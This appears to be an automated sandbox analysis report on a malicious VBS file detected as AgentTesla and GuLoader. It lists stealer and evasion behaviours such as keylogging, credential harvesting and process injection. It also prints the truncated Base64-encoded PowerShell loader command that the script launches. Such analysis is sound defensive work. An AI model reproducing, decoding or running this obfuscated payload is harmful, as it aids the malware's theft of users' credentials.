Windows
Analysis Report
PUMP mt310143121.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Yara detected GuLoader
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Compiles code for process injection (via .Net compiler)
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64native
wscript.exe (PID: 8888 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\PUMP mt31014312 1.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) powershell.exe (PID: 9092 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - NoExit -En codedComma nd "JABNAG kAbABqAHYA cgBuAGUAdA BsACAAPQAg AEAAJwANAA oASQBtACQA SABhAHUAUw B0AHYAQQBz AG8ARwByAH IARgBpADkA VABpACAAQg BpAD0AYQBm ACAAQQBmAC IAQQBmAFYA RABpAGkAUg BlAHIAUwBw AHQAQQBmAH UATABvAGEA UgBlAGwASw BhAEEAUAB0 AGwAQQBnAG wAUgBlAG8A UgBlAGMAUA BoACIACgBT AHQAQQBLAG 8AZABDAGgA ZABMAHUALQ BCAG8AVABJ AGQAeQBsAG UAcABSAGkA ZQBBAG4AIA BlAHEALQBT AGsAVABOAG UAeQBVAG4A cABFAHMAZQ BTAHQARABD AGEAZQBPAH AAZgBWAGUA aQBQAG8Abg BEAGUAaQBJ AGQAdABTAH QAaQBBAHQA bwBOAG8Abg BLAGUAIABD AGgAQABWAG UAIgAKAHUA ZAB1AEYAbw BzAFIAZQBp AEEAawBuAG EAZgBnAEEA cwAgAEwAZQ BTAE8AcAB5 AEMAeQBzAF MAZQB0AEQA aQBlAEEAbg BtAFAAcgA7 AAoAdABpAH UARgBhAHMA QQBwAGkASQ BuAG4AbwBw AGcASQBuAC AAQgBhAFMA TwBwAHkAQQ BrAHMAVQBu AHQAVgBpAG UATQBlAG0A VgBlAC4Adg BlAFIAbwB2 AHUAQwBvAG 4AZQB4AHQA VABhAGkARA BpAG0ATABh AGUAUwB0AC 4AVgBlAEkA QgBpAG4ASw BvAHQARwBv AGUAQwBpAH IAQQBuAG8A RgBsAHAAWQ BvAFMAVABo AGUAVQBuAH IAZQBpAHYA VQBkAGkARw BzAGMAUwBo AGUAUgBvAH MAUABsADsA CgBPAHAAcA BTAHkAdQBS AGEAYgBGAG EAbABNAGEA aQBXAGkAYw B1AG4AIABB AHUAcwBJAG 4AdABQAG8A YQBVAHAAdA BTAGEAaQBH AHIAYwBEAG 8AIABzAGsA YwByAGkAbA BNAGkAYQBX AG8AcwBGAH IAcwBpAG4A IABTAHQAQw BHAGkAbABW AG8AYQBTAH UAZABJAG4A bwBNAHkAZw BHAHQAZQBT AHQAbgBBAH IAZQBGAGEA dABMAG8AMQ AKAFMAcAB7 AEEAcwBbAE cAbgBEAGIA ZQBsAFUAbg BsAEIAdQBJ AEYAeQBtAE QAbwBwAEYA YQBvAFYAZQ ByAFQAcgB0 AFUAbgAoAF AAaAAiAEsA ZQB1AFUAaQ BzAFMAdQBl AFAAcwByAE YAbgAzAEEA cAAyAHMAaw AiAHQAcgAp AEcAcgBdAE UAbgBwAFAA aQB1AE8AcA BiAFMAdABs AHMAYQBpAF MAcABjAFYA aQAgAFMAdQ BzAFAAbwB0 AEgAYQBhAF MAawB0AEIA ZQBpAFMAYw BjAFUAbgAg AEQAaQBlAE UAcgB4AFAA dQB0AFMAdg BlAEEAcgBy AFcAYQBuAE kAbgAgAEcA ZwBpAFAAZQ BuAE0AYQB0 AFUAbgAgAH QAcgBDAFAA aQByAEEAYQ BlAEQAZQBh AFMAbAB0AF MAdABlAEsA bABNAEIAdQ BEAFAAbABJ AGkAbgBXAF UAbgBpAEUA bABuAHMAdA BkAFIAZQBv AFYAYQB3AE 0AYQAoAEwA YQBpAEEAbg BuAFMAawB0 AFMAdAAgAE IAZQBOAEYA bAB2AFUAbg BoAEkAcgBp AEUAbQBlAE MAbwAsAEEA bgBpAEMAaA BuAFAAcgB0 AEQAaQAgAE YAbwBIAEwA YQBlAEsAbA BhAEIAZQAs AGQAcgBpAF QAYQBuAEYA bwB0AEIAZQ AgAFIAZQBo AFAAYQBhAE YAbwB0AGEA ZgBjAEIAcg BoAFQAcgAs AEwAYQBpAE IAcgBuAEYA bwB0AFQAZQ AgAFUAbgBQ AFQAbwBpAE IAbwBuAE0A YQBpAEQAaQ AsAE0AZQBp AE4AbwBuAE YAagB0AEMA aAAgAGQAdQ BPAE0AYQB2 AEgAZQBlAE 8AcgByAFMA YQBpAFMAbA AsAEYAbwBp AE4AYQBuAH IAZQB0AE8A dgAgAFAAZQ BSAHUAbgBl AEEAbgBjAE 8AYgBpAE0A bwB0AEUAbA BhAHAAYQAs AFIAZQBpAF MAYQBuAEMA YQB0AEgAYQ AgAFAAcgBP AEcAbwBwAE EAdQBrAFMA bgByAE4Abw AsAEIAcgBp AG0AYQBuAE kAbgB0AEQA YQAgAEEAdQ BDAFIAaQBy AFAAcgBvAE gAYQBjAEgA ZQBrAHMAaw AsAGEAawBp AFIAdQBuAE gAeQB0AE0A ZQAgAE0AYQ BBAFAAaAB1 AE4AYQB0AF kAbwBvAEEA cwBzAFMAZA AsAEcAdQBp AEEAZgBuAE EAcAB0AFMA awAgAFUAbg BSAFAAbABl AEEAZgB0AF MAawByAFcA cgApAE8AcA